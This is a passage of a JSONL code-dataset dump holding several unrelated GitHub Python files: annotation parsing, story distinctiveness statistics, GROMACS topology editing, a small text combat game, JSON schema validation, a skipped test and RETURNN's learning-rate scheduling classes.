w)/2\n y = int(z - t)\n x = int(w - y)\n return x, y\n\n\ndef read(annotation_path, json_path):\n \"\"\"Parses a .json file to load annotation data from a .png file.\n \n :param annotation_path: The path to the annotation .png file\n :param json_path: The path to the .json file\n :return: an AnnotationData object containing the loaded data\n \"\"\"\n\n try:\n with open(json_path, 'r') as json_file:\n json_data = json.load(json_file)\n\n except IOError:\n print(\"Cannot find .json file\")\n return None\n\n try:\n image_data = numpy.array(Image.open(annotation_path))\n except IOError:\n print(\"Cannot find annotation file\")\n return None\n\n if \"labels\" not in json_data:\n print(\"Error parsing json file\")\n return None\n\n # else\n return AnnotationData(json_data[\"labels\"], image_data)\n","repo_name":"ReemHal/Python_annotation_tool","sub_path":"scripts/image_annotation_parser.py","file_name":"image_annotation_parser.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70054564327","text":"\"\"\"\nCalculates the skew-based distinctiveness (minus communciations words) for each\nstory across a range of roles and character rank groups, saving the results in a\nseries of .tsv files.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom collections import defaultdict\nfrom multiprocessing import Process\nfrom nltk.stem import WordNetLemmatizer\n\nfrom aliases import AliasesManager\nfrom collocates import CollocatesManager\nfrom corpus import CorpusManager\nfrom distinctiveness import SkewDistinctivenessCalculator\nfrom ranks import RANK_GROUPS\nfrom role import ROLES\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n# Filepath to \"said\" words.\nSAID_DICT_PATH = \"../resources/said_dict.txt\"\n\n\n# Returns a set of \"said\" words, lemmatized.\ndef load_said_words():\n\twords = []\n\twith open(SAID_DICT_PATH) as f:\n\t\tfor line in f:\n\t\t\twords += [p.strip().replace(' ', '-') for p in line.split('\\t')]\n\n\tlemmatizer = WordNetLemmatizer()\n\n\t# Lemmatize and convert to set and add 'say'.\n\treturn set([lemmatizer.lemmatize(w) for w in words] + ['say'])\n\ndef main():\n\tparser_description = (\"Calculates the skew-based distinctiveness for each \"\n\t\t\"story across a range of roles and character rank groups, saving the \"\n\t\t\"results in a series of .tsv files.\")\n\tparser = argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_dirpath', help=\"Path to output directory\")\n\n\tparser.add_argument('n', help=\"# worker threads to spawn\", type=int)\n\t\n\targs = parser.parse_args()\n\n\t# Add None for considering all roles.\n\troles = [None] + ROLES\n\n\taliases_manager = AliasesManager()\n\tcollocates_manager = CollocatesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\t# Get publication dates for all stories.\n\tdates = corpus_manager.get_dates()\n\t# Story Id's.\n\tsids = corpus_manager.get_ids(origin='gen')\n\n\t# Group parameter settings for each worker process.\n\tparam_groups, i = defaultdict(list), 0\n\tfor rg in RANK_GROUPS:\n\t\tfor role in roles:\n\t\t\tparam_groups[i % args.n].append((rg, role))\n\t\t\ti += 1\n\n\t# Create the output directory if it doesn't already exist.\n\tif not os.path.exists(args.out_dirpath):\n\t\tos.makedirs(args.out_dirpath)\n\n\tsaid_words = load_said_words()\n\n\tdef run_distinctiveness_calc(worker_name, params):\n\t\tfor rg, role in params:\n\t\t\trg_name, ranks = rg[0], rg[1]\n\n\t\t\trole_name = role.lower() if role else 'all'\n\t\t\tout_path = os.path.join(args.out_dirpath, '%s-%s.tsv' % (role_name,\n\t\t\t\trg_name.lower()))\n\n\t\t\tif role_name != 'all':\n\t\t\t\tcontinue\n\n\t\t\tif rg_name.lower() != 'all' and rg_name.lower() != 'top':\n\t\t\t\tcontinue\n\n\t\t\tlogging.info(worker_name + \": Processing... (Outputting to %s)\" %\n\t\t\t\tout_path)\n\t\t\n\t\t\tdistinct_calculator = SkewDistinctivenessCalculator(role=role,\n\t\t\t\tranks=ranks)\n\n\t\t\twith open(out_path, 'wb') as f:\n\t\t\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t\t\t# Write header.\n\t\t\t\twriter.writerow(['STORY ID', 'PUB. DATE', 'GENRE',\n\t\t\t\t\t'DISTINCTIVENESS'])\n\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif not aliases_manager.saved(sid, tpe='character') or \\\n\t\t\t\t\t\tnot collocates_manager.saved(sid, tpe='character'):\n\t\t\t\t\t\tlogging.info(worker_name + \": Skipping %s...\" % sid)\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tgenre = (None if sid.startswith('000') else\n\t\t\t\t\t\tcorpus_manager.get_genre(sid))\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcollocates = collocates_manager.get(sid,\n\t\t\t\t\t\t\ttpe='character', role=role, ranks=ranks)\n\n\t\t\t\t\t\tcomm_collocates = [coll for coll in collocates\n\t\t\t\t\t\t\tif coll['token']['lemma'] not in said_words]\n\n\t\t\t\t\t\trow = [sid, dates[sid] if sid in dates else 'DNE',\n\t\t\t\t\t\t\tgenre if genre else 'DNE',\n\t\t\t\t\t\t\tdistinct_calculator.calc(collocates=comm_collocates)]\n\n\t\t\t\t\t\twriter.writerow(row)\n\n\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\tlogging.info(worker_name + \": Skipping %s...\" % sid)\n\t\t\t\n\t\t\tlogging.info(worker_name + \": Finished!\")\t\n\t\n\tfor i, params in param_groups.iteritems():\n\t\tp = Process(target=run_distinctiveness_calc, args=(\"T%d\" % (i + 1),\n\t\t\tparams,))\n\t\tp.start()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"rbudac/McGill-Characterization-Process","sub_path":"scripts/calc_skew_distinctiveness_minus_comm.py","file_name":"calc_skew_distinctiveness_minus_comm.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24647126280","text":"import sys\r\n\r\n#Função para encontrar numero da linha que contém o argumemnto desejado\r\ndef get_line(txt):\r\n file = open('topol.top', encoding='utf8')\r\n for line_num, value in enumerate(file, 1): #le todas as linhas e valores do file começando como 1\r\n if txt in value: #qdo encontra o 'txt' retorna o valor da linha\r\n return line_num\r\n\r\nif len(sys.argv) < 3:\r\n print('ERROR: put lig and cof names without extension')\r\n\r\nelse:\r\n # #Arguments\r\n lig = sys.argv[1]\r\n cof = sys.argv[2]\r\n\r\n #txt to find the line number and add after or before the arguments .prm and .itp\r\n x = str('#include \"./charmm36-mar2019.ff/forcefield.itp\"')\r\n y = str('; Include Position restraint file')\r\n z = str('Protein 1')\r\n\r\n #Open topol.top -> Read lines and add the argument .prm\r\n file = open('topol.top', 'r+', encoding='utf8')\r\n line = file.readlines()\r\n line.insert(get_line(x),f'\\n; Include ligand parameters\\n#include \"{lig}.prm\"\\n#include \"{cof}.prm\"\\n')\r\n file.seek(0)\r\n file.writelines(line)\r\n \r\n #Open topol.top -> Read lines and add the argument .itp\r\n file = open('topol.top', 'r+', encoding='utf8')\r\n line = file.readlines()\r\n line.insert(get_line(y)+ 4,f'; Include ligand topology\\n#include \"{lig}.itp\"\\n#include \"{cof}.itp\"\\n\\n')\r\n file.seek(0)\r\n file.writelines(line)\r\n \r\n #Open topol.top -> Read lines and add the argument final molecules number\r\n file = open('topol.top', 'r+', encoding='utf8')\r\n line = file.readlines()\r\n line.insert(get_line(z),f'\\n{lig} 1\\n{cof} 1')\r\n file.seek(0)\r\n file.writelines(line)\r\n","repo_name":"lbfederico/gromacs_scripts","sub_path":"Step_by_step/topol_lig_cof.py","file_name":"topol_lig_cof.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13300649895","text":"import random\nkasutaja = input(\"Mis on sinu nimi\")\n\nkontroll = True\nwhile kontroll == True:\n relv = input(\"warrior, twosword, defender\")\n turvis = input(\"light, medium, heavy\")\n if (relv == \"warrior\" or relv == \"twosword\" or relv == \"defender\") and (turvis == \"light\" or turvis == \"medium\" or turvis == \"heavy\"):\n kontroll = False\n else:\n print(\"palun sisesta uuesti\")\n \nplayer = {\n \"nimi\" : kasutaja,\n \"elud\" : 50,\n \"relv\" : relv,\n \"turvis\" : turvis,\n \"elu pott\" : 2\n }\nDiablo = {\n \"nimi\" : \"Diablo\",\n \"elud\" : 1500,\n \"relv\" : \"põrgu küüned\",\n \"turvis\" : \"lohe nahk\",\n \"maagia\" : \"tõukab vastast\"\n }\n\nif turvis == \"light\":\n armor = 4\nelif turvis == \"medium\":\n armor = 8\nelif turvis == \"heavy\":\n armor = 16\n \ncombat = True\nwhile combat == True:\n \"\"\"print (\"Kasutja lööb\")\n Diablo[\"elud\"] = Diablo[\"elud\"] - random.randint(0, 10)\n print (\"Diablo lööb, pane vaim valmis\")\n player[\"elud\"] = player[\"elud\"] - random.randint(15, 25)\"\"\"\n if player[\"relv\"] == \"warrior\":\n dmg = random.randint(8, 14)\n elif player[\"relv\"] == \"defender\":\n dmg = random.randint(7,12)\n elif player[\"relv\"] == \"twosword\":\n dmg = random.randint(10, 20)\n \n if dmg >= 11: #tegelane ründab\n Diablo[\"elud\"] = Diablo[\"elud\"] - dmg\n print(Diablo[\"elud\"])\n else:\n print(\"Diablo ei saanud haiget\")\n \n \n if random.randint(0, 20) >= armor: #Diablo ründab\n player[\"elud\"] = player[\"elud\"] - dmg\n print(player[\"elud\"])\n else:\n print(\"Tegelane ei saanud haiget\")\n \n \n if player[\"elud\"] < 0:\n combat = False\n print(\"YOU DIED!\")\nprint(\"Game over!\")","repo_name":"HenriTammo/Python","sub_path":"nädal2/mäng.py","file_name":"mäng.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7781980286","text":"#!/usr/bin/env python3\n\nimport json\nimport sys\n\nfrom jsonschema import validate, draft7_format_checker, ValidationError\n\n\ndef run(args):\n try:\n instance = json.load(args.instance)\n schema = json.load(args.schema)\n except json.decoder.JSONDecodeError as why:\n sys.stderr.write(f\"JSON decoding error: {why}\\n\")\n sys.exit(1)\n try:\n validate(instance, schema, format_checker=draft7_format_checker)\n except ValidationError as why:\n sys.stderr.write(f\"{why}\\n\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Validate a JSON file.\")\n parser.add_argument(\"schema\", type=open, help=\"The JSON schema file\")\n parser.add_argument(\"instance\", type=open, help=\"The JSON instance file\")\n try:\n args = parser.parse_args()\n except Exception as why:\n sys.stderr.write(f\"{why}\\n\")\n sys.exit(1)\n run(args)\n","repo_name":"ietf-github-services/issue-summary","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41988859564","text":"from textwrap import dedent\n\nimport pytest\nfrom libcst import parse_module\nfrom libcst.metadata import FunctionScope\n\nfrom snakepack.analyzers.python.literals import LiteralDuplicationAnalyzer\nfrom snakepack.analyzers.python.scope import ScopeAnalyzer\nfrom snakepack.assets.python import PythonModuleCst, PythonModule\n\n\n@pytest.mark.skip\nclass LiteralDuplicationAnalyzerIntegrationTest:\n def test_analyze(self):\n content = PythonModuleCst(\n cst=parse_module(\n dedent(\n \"\"\"\n a = 'foo'\n b: str = 'foo'\n b += 'invalidate'\n c = 'foo'\n c += ''\n d = 'foo'\n d: str = 'foo'\n e = 'foo'\n e = 'not anymore'\n \n x = 'bar'\n y('bar', 'bar', 'bar')\n \"\"\"\n )\n )\n )\n module = PythonModule(\n full_name='a',\n content=content,\n source=None\n )\n\n analyzer = LiteralDuplicationAnalyzer()\n analysis = analyzer.analyse(module)\n\n foo_node = content.cst.body[0].body[0].value\n foo_assignments = analysis.get_preceding_assignments(module, foo_node)\n\n assert len(foo_assignments) == 1\n assert 'a' in foo_assignments\n assert len(foo_assignments['a']) == 1\n\n bar_node = content.cst.body[9].body[0].value\n bar_assignments = analysis.get_preceding_assignments(module, bar_node)\n\n assert len(bar_assignments) == 1\n assert 'x' in bar_assignments\n assert len(bar_assignments['x']) == 1\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/integration/analyzers/python/test_literals.py","file_name":"test_literals.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3009915015","text":"\"\"\"\nProvides the learning rate scheduling logic.\nThe base class is :class:`LearningRateControl`.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport typing\nfrom returnn.util.basic import better_repr, simple_obj_repr, ObjAsDict, unicode\nfrom returnn.log import log\nimport numpy\n\n\nclass LearningRateControl(object):\n \"\"\"\n Base class for learning rate control / scheduling.\n \"\"\"\n\n need_error_info = True\n\n class EpochData:\n \"\"\"\n Encapsulates all relevant information for one epoch,\n needed to perform learning rate scheduling,\n such as the individual scores (cv or train; cross-entropy or frame-error or whatever).\n \"\"\"\n\n # Need to keep the non-PEP8 name for compatibility, because we store the repr of the object.\n # noinspection PyPep8Naming\n def __init__(self, learningRate, error=None):\n \"\"\"\n :type learningRate: float\n :type error: dict[str,float] | None\n \"\"\"\n self.learning_rate = learningRate\n if isinstance(error, float): # Old format.\n error = {\"old_format_score\": error}\n if error is None:\n error = {}\n self.error = error\n\n def __repr__(self):\n # This is being used for serialization, and we want some forward/backward compatibility,\n # so we should try to keep this consistent.\n return \"EpochData(learningRate=%s, error=%s)\" % (better_repr(self.learning_rate), better_repr(self.error))\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n return {\n \"default_learning_rate\": config.float(\"learning_rate\", 1.0),\n \"min_learning_rate\": config.float(\"min_learning_rate\", 0.0),\n \"default_learning_rates\": config.typed_value(\"learning_rates\") or config.float_list(\"learning_rates\"),\n \"error_measure_key\": (\n config.typed_value(\"learning_rate_control_error_measure\")\n or config.value(\"learning_rate_control_error_measure\", None)\n ),\n \"relative_error_also_relative_to_learning_rate\": (\n config.bool(\"learning_rate_control_relative_error_relative_lr\", False)\n ),\n \"min_num_epochs_per_new_learning_rate\": config.int(\"learning_rate_control_min_num_epochs_per_new_lr\", 0),\n \"relative_error_div_by_old\": config.bool(\"newbob_relative_error_div_by_old\", False),\n \"learning_rate_decay\": config.typed_value(\n \"learning_rate_decay\", config.opt_typed_value(\"newbob_learning_rate_decay\", 0.5)\n ),\n \"learning_rate_growth\": config.typed_value(\n \"learning_rate_growth\", config.opt_typed_value(\"newbob_learning_rate_growth\", 1.0)\n ),\n \"filename\": config.value(\"learning_rate_file\", None),\n }\n\n @classmethod\n def load_initial_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: LearningRateControl\n \"\"\"\n kwargs = cls.load_initial_kwargs_from_config(config)\n return cls(**kwargs)\n\n def __init__(\n self,\n default_learning_rate,\n min_learning_rate=0.0,\n default_learning_rates=None,\n error_measure_key=None,\n relative_error_also_relative_to_learning_rate=False,\n min_num_epochs_per_new_learning_rate=0,\n relative_error_div_by_old=False,\n learning_rate_decay=1.0,\n learning_rate_growth=1.0,\n filename=None,\n ):\n \"\"\"\n :param float default_learning_rate: default learning rate. usually for epoch 1\n :param list[float] | dict[int,float] default_learning_rates: learning rates\n :param str|list[str]|None error_measure_key: for get_epoch_error_value() the key for EpochData.error\n which is a dict\n :param int min_num_epochs_per_new_learning_rate: if the lr was recently updated, use it for at least N epochs\n :param bool relative_error_div_by_old: if True, compute relative error as (new - old) / old.\n :param float|(float)->float learning_rate_decay:\n :param float|(float)->float learning_rate_growth:\n :param str filename: load from and save to file\n \"\"\"\n self.epoch_data = {} # type: typing.Dict[int,LearningRateControl.EpochData]\n self.filename = filename\n if filename:\n if os.path.exists(filename):\n print(\"Learning-rate-control: loading file %s\" % filename, file=log.v4)\n # Load now, such that default_learning_rates is correctly handled.\n self.load()\n else:\n print(\"Learning-rate-control: file %s does not exist yet\" % filename, file=log.v4)\n else:\n print(\n \"Learning-rate-control: no file specified, not saving history (no proper restart possible)\", file=log.v4\n )\n self.default_learning_rate = default_learning_rate\n self.min_learning_rate = min_learning_rate\n if default_learning_rates:\n if isinstance(default_learning_rates, list):\n default_learning_rates = {i + 1: v for (i, v) in enumerate(default_learning_rates)}\n if isinstance(default_learning_rates, (str, unicode)):\n default_learning_rates = eval(default_learning_rates)\n assert isinstance(default_learning_rates, dict)\n for epoch, v in default_learning_rates.items():\n self.set_default_learning_rate_for_epoch(epoch, v)\n self.default_learning_rates = default_learning_rates\n self.error_measure_key = error_measure_key\n self.relative_error_also_relative_to_learning_rate = relative_error_also_relative_to_learning_rate\n self.min_num_epochs_per_new_learning_rate = min_num_epochs_per_new_learning_rate\n self.relative_error_div_by_old = relative_error_div_by_old\n self.learning_rate_decay = learning_rate_decay\n self.learning_rate_growth = learning_rate_growth\n\n __repr__ = simple_obj_repr\n\n def __str__(self):\n epochs = sorted(self.epoch_data.keys())\n if len(epochs) > 6:\n epoch_str = \", \".join(\n [\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs[:3]]\n + [\"...\"]\n + [\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs[-3:]]\n )\n else:\n epoch_str = \", \".join([\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs])\n return \"%r, epoch data: %s, error key: %s\" % (self, epoch_str, self.get_error_key(epoch=1))\n\n @staticmethod\n def _calc_learning_rate_update(learning_rate, update):\n \"\"\"\n :param float learning_rate:\n :param None|float|(float)->float update: factor, or generic func\n :return: lr with update applied (e.g. decay factor)\n :rtype: float\n \"\"\"\n if update is None:\n return learning_rate\n if isinstance(update, float):\n return learning_rate * update\n assert callable(update)\n learning_rate = update(learning_rate)\n assert isinstance(learning_rate, float)\n return learning_rate\n\n def _calc_learning_rate_decay(self, learning_rate):\n \"\"\"\n :param float learning_rate:\n :return: lr with decay applied\n :rtype: float\n \"\"\"\n return self._calc_learning_rate_update(learning_rate, update=self.learning_rate_decay)\n\n def _calc_learning_rate_growth(self, learning_rate):\n \"\"\"\n :param float learning_rate:\n :return: lr with growth applied\n :rtype: float\n \"\"\"\n return self._calc_learning_rate_update(learning_rate, update=self.learning_rate_growth)\n\n def calc_learning_rate_decay_or_grow(self, learning_rate, decay, grow=None):\n \"\"\"\n :param float learning_rate:\n :param bool decay:\n :param bool|None grow: default is not decay\n :return: lr with decay or growth applied\n :rtype: float\n \"\"\"\n assert isinstance(decay, bool)\n if grow is None:\n grow = not decay\n assert isinstance(grow, bool)\n assert not (grow and decay) # not sure if this makes sense...\n if decay:\n learning_rate = self._calc_learning_rate_decay(learning_rate)\n if learning_rate < self.min_learning_rate:\n learning_rate = self.min_learning_rate\n if grow:\n learning_rate = self._calc_learning_rate_growth(learning_rate)\n return learning_rate\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n raise NotImplementedError\n\n def calc_new_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :param int epoch:\n :return: new learning rate for this epoch\n :rtype: float\n \"\"\"\n if self.min_num_epochs_per_new_learning_rate > 1:\n last_lrs = [\n self.epoch_data[e].learning_rate\n for e in self._last_epochs_for_epoch(epoch, num_epochs=self.min_num_epochs_per_new_learning_rate)\n ]\n if len(set(last_lrs)) >= 2 or 0 < len(last_lrs) < self.min_num_epochs_per_new_learning_rate:\n return last_lrs[-1]\n learning_rate = self.calc_learning_rate_for_epoch(epoch)\n return learning_rate\n\n def _last_epochs_for_epoch(self, epoch, num_epochs):\n \"\"\"\n :param int epoch:\n :param int num_epochs:\n :return: last N epochs where we have some epoch data\n :rtype: list[int]\n \"\"\"\n last_epochs = sorted([e for e in self.epoch_data.keys() if e < epoch])\n if not last_epochs:\n return []\n last_epochs = last_epochs[-num_epochs:]\n return last_epochs\n\n def get_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :type epoch: int\n :rtype: float\n \"\"\"\n assert epoch >= 1\n if epoch in self.epoch_data:\n return self.epoch_data[epoch].learning_rate\n learning_rate = self.calc_new_learning_rate_for_epoch(epoch)\n self.set_default_learning_rate_for_epoch(epoch, learning_rate)\n return learning_rate\n\n def set_default_learning_rate_for_epoch(self, epoch, learning_rate):\n \"\"\"\n :type epoch: int\n :type learning_rate: float\n \"\"\"\n if epoch in self.epoch_data:\n if not self.epoch_data[epoch].learning_rate:\n self.epoch_data[epoch].learning_rate = learning_rate\n else:\n self.epoch_data[epoch] = self.EpochData(learning_rate)\n\n def get_last_epoch(self, epoch):\n \"\"\"\n :param int epoch:\n :return: last epoch before ``epoch`` where we have some epoch data\n :rtype: int\n \"\"\"\n epochs = sorted([e for e in self.epoch_data.keys() if e < epoch])\n if not epochs:\n return None\n return epochs[-1]\n\n def get_most_recent_learning_rate(self, epoch, exclude_current=True):\n \"\"\"\n :param int epoch:\n :param bool exclude_current:\n :return: most learning rate before or including ``epoch``\n :rtype: float\n \"\"\"\n for e, data in reversed(sorted(self.epoch_data.items())):\n assert isinstance(data, LearningRateControl.EpochData)\n if e > epoch:\n continue\n if exclude_current and e == epoch:\n continue\n if data.learning_rate is None:\n continue\n return data.learning_rate\n return self.default_learning_rate\n\n def calc_relative_error(self, old_epoch, new_epoch):\n \"\"\"\n :param int old_epoch:\n :param int new_epoch:\n :return: relative error between old epoch and new epoch\n :rtype: float\n \"\"\"\n old_key, old_error = self.get_epoch_error_key_value(old_epoch)\n new_key, new_error = self.get_epoch_error_key_value(new_epoch)\n if old_error is None or new_error is None:\n return None\n if old_key != new_key:\n return None\n if self.relative_error_div_by_old:\n relative_error = (new_error - old_error) / abs(old_error)\n else:\n relative_error = (new_error - old_error) / abs(new_error)\n if self.relative_error_also_relative_to_learning_rate:\n learning_rate = self.get_most_recent_learning_rate(new_epoch, exclude_current=False)\n if learning_rate > 0:\n # If the learning rate is lower than the initial learning rate,\n # the relative error is also expected to be lower, so correct for that here.\n relative_error /= learning_rate / self.default_learning_rate\n return relative_error\n\n def set_epoch_error(self, epoch, error):\n \"\"\"\n :type epoch: int\n :type error: dict[str,float|dict[str,float]]\n \"\"\"\n if epoch not in self.epoch_data:\n print(\"Learning rate not set for epoch %i. Assuming default.\" % epoch, file=log.v4)\n self.get_learning_rate_for_epoch(epoch) # This will set it.\n assert isinstance(error, dict)\n error = error.copy()\n for k, v in list(error.items()):\n if isinstance(v, dict): # like error = {\"dev_score\": {\"cost:output1\": .., \"cost:output2\": ...}, ...}\n del error[k]\n if len(v) == 1:\n error[k] = list(v.values())[0]\n continue\n for k1, v1 in v.items():\n if \":\" in k1:\n k1 = k1[k1.index(\":\") + 1 :]\n error[k + \"_\" + k1] = v1\n for v in error.values():\n assert isinstance(v, float)\n self.epoch_data[epoch].error.update(error)\n if epoch == 1:\n print(\"Learning-rate-control: error key %r from %r\" % (self.get_error_key(epoch), error), file=log.v4)\n\n def get_error_key(self, epoch):\n \"\"\"\n :param int epoch:\n :return: key which we should look in scores/errors, for this epoch\n :rtype: str\n \"\"\"\n if epoch not in self.epoch_data:\n if isinstance(self.error_measure_key, list):\n return self.error_measure_key[0]\n assert isinstance(self.error_measure_key, (str, type(None)))\n return self.error_measure_key\n epoch_data = self.epoch_data[epoch]\n if not epoch_data.error:\n return None\n if len(epoch_data.error) == 1 and \"old_format_score\" in epoch_data.error:\n return \"old_format_score\"\n keys = []\n if isinstance(self.error_measure_key, list):\n for key in self.error_measure_key:\n keys += [key, key + \"_output\"] # for multiple outputs, try default output\n elif isinstance(self.error_measure_key, str):\n keys += [self.error_measure_key, self.error_measure_key + \"_output\"]\n else:\n assert self.error_measure_key is None\n keys += [\"dev_score\", \"dev_score_output\"]\n for key in keys:\n if key in epoch_data.error:\n return key\n for key in sorted(epoch_data.error.keys()):\n if key == \"dev_score_output/output\" or key.startswith(\"dev_score_output/output_\"):\n return key\n for key in sorted(epoch_data.error.keys()):\n if key.startswith(\"dev_score_output/\"):\n return key\n for key in sorted(epoch_data.error.keys()):\n if key.startswith(\"dev_\"):\n return key\n for key in [\"train_score\", \"train_score_output\"]:\n if key in epoch_data.error:\n return key\n return min(epoch_data.error.keys())\n\n def get_epoch_error_dict(self, epoch):\n \"\"\"\n :param int epoch:\n :rtype: dict[str,float]\n \"\"\"\n if epoch not in self.epoch_data:\n return {}\n return self.epoch_data[epoch].error\n\n def get_epoch_error_value(self, epoch):\n \"\"\"\n :param int epoch:\n :return: error/score for the specific epoch, given the error-key, see :func:`get_error_key`\n :rtype: float\n \"\"\"\n error = self.get_epoch_error_dict(epoch)\n if not error:\n return None\n key = self.get_error_key(epoch)\n assert key\n assert key in error, \"%r not in %r. fix %r in config. set it to %r or so.\" % (\n key,\n error,\n \"learning_rate_control_error_measure\",\n \"dev_error\",\n )\n return error[key]\n\n def get_epoch_error_key_value(self, epoch):\n \"\"\"\n :param int epoch:\n :return: key, error\n :rtype: (str, float)\n \"\"\"\n error = self.get_epoch_error_dict(epoch)\n if not error:\n return None, None\n key = self.get_error_key(epoch)\n assert key\n assert key in error, \"%r not in %r. fix %r in config. set it to %r or so.\" % (\n key,\n error,\n \"learning_rate_control_error_measure\",\n \"dev_error\",\n )\n return key, error[key]\n\n def get_last_best_epoch(\n self,\n last_epoch,\n first_epoch=1,\n only_last_epochs=None,\n filter_score=float(\"inf\"),\n only_last_n=-1,\n min_score_dist=0.0,\n ):\n \"\"\"\n :param int first_epoch: will check all epochs >= first_epoch\n :param int last_epoch: inclusive. will check all epochs <= last_epoch\n :param int|None only_last_epochs: if set, will only check the last N epochs, inclusive\n :param float filter_score: all epochs which values over this score are not considered\n :param int only_last_n: if set (>=1), *from the resulting list*, we consider only the last only_last_n\n :param float min_score_dist: filter out epochs where the diff to the most recent is not big enough\n :return: the last best epoch. to get the details then, you might want to use getEpochErrorDict.\n :rtype: int|None\n \"\"\"\n if only_last_epochs:\n first_epoch = max(first_epoch, last_epoch - only_last_epochs + 1)\n if first_epoch > last_epoch:\n return None\n values = [(self.get_epoch_error_key_value(ep), ep) for ep in range(first_epoch, last_epoch + 1)]\n # Note that the order of the checks here is a bit arbitrary but I had some thoughts on it.\n # Changing the order will also slightly change the behavior, so be sure it make sense.\n values = [((key, v), ep) for ((key, v), ep) in values if v is not None]\n if not values:\n return None\n last_key, latest_score = values[-1][0]\n values = [(v, ep) for ((key, v), ep) in values if key == last_key] # only same key\n values = [(v, ep) for (v, ep) in values if v <= filter_score]\n if not values:\n return None\n if only_last_n >= 1:\n values = values[-only_last_n:]\n values = [(v, ep) for (v, ep) in values if v + min_score_dist < latest_score]\n if not values:\n return None\n return min(values)[1]\n\n def save(self):\n \"\"\"\n Save the current epoch data to file (self.filename).\n \"\"\"\n if not self.filename:\n return\n directory = os.path.dirname(self.filename)\n if directory and not os.path.exists(directory):\n os.makedirs(directory, exist_ok=True)\n # First write to a temp-file, to be sure that the write happens without errors.\n # Otherwise, it could happen that we delete the old existing file, then\n # some error happens (e.g. disk quota), and we loose the newbob data.\n # Loosing that data is very bad because it basically means that we have to redo all the training.\n tmp_filename = self.filename + \".new_tmp\"\n f = open(tmp_filename, \"w\")\n f.write(better_repr(self.epoch_data))\n f.write(\"\\n\")\n f.close()\n os.rename(tmp_filename, self.filename)\n\n def load(self):\n \"\"\"\n Loads the saved epoch data from file (self.filename).\n \"\"\"\n s = open(self.filename).read()\n self.epoch_data = eval(s, {\"nan\": float(\"nan\"), \"inf\": float(\"inf\")}, ObjAsDict(self))\n\n\nclass ConstantLearningRate(LearningRateControl):\n \"\"\"\n Just a constant learning rate.\n \"\"\"\n\n need_error_info = False\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Dummy constant learning rate. Returns initial learning rate.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n while True:\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n epoch = last_epoch\n continue\n return learning_rate\n\n\nclass NewbobRelative(LearningRateControl):\n \"\"\"\n If relative diff between old and new error is over some threshold, decay learning rate.\n \"\"\"\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobRelative, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"relative_error_threshold\": config.float(\"newbob_relative_error_threshold\", -0.01),\n }\n )\n return kwargs\n\n def __init__(self, relative_error_threshold, **kwargs):\n \"\"\"\n :type relative_error_threshold: float\n \"\"\"\n super(NewbobRelative, self).__init__(**kwargs)\n self.relative_error_threshold = relative_error_threshold\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n return self.default_learning_rate\n last2_epoch = self.get_last_epoch(last_epoch)\n if last2_epoch is None:\n return learning_rate\n relative_error = self.calc_relative_error(last2_epoch, last_epoch)\n if relative_error is None:\n return learning_rate\n learning_rate = self.calc_learning_rate_decay_or_grow(\n learning_rate, decay=relative_error > self.relative_error_threshold\n )\n return learning_rate\n\n\nclass NewbobAbs(LearningRateControl):\n \"\"\"\n If absolute diff between old and new error is over some threshold, decay learning rate.\n \"\"\"\n\n @classmethod\n 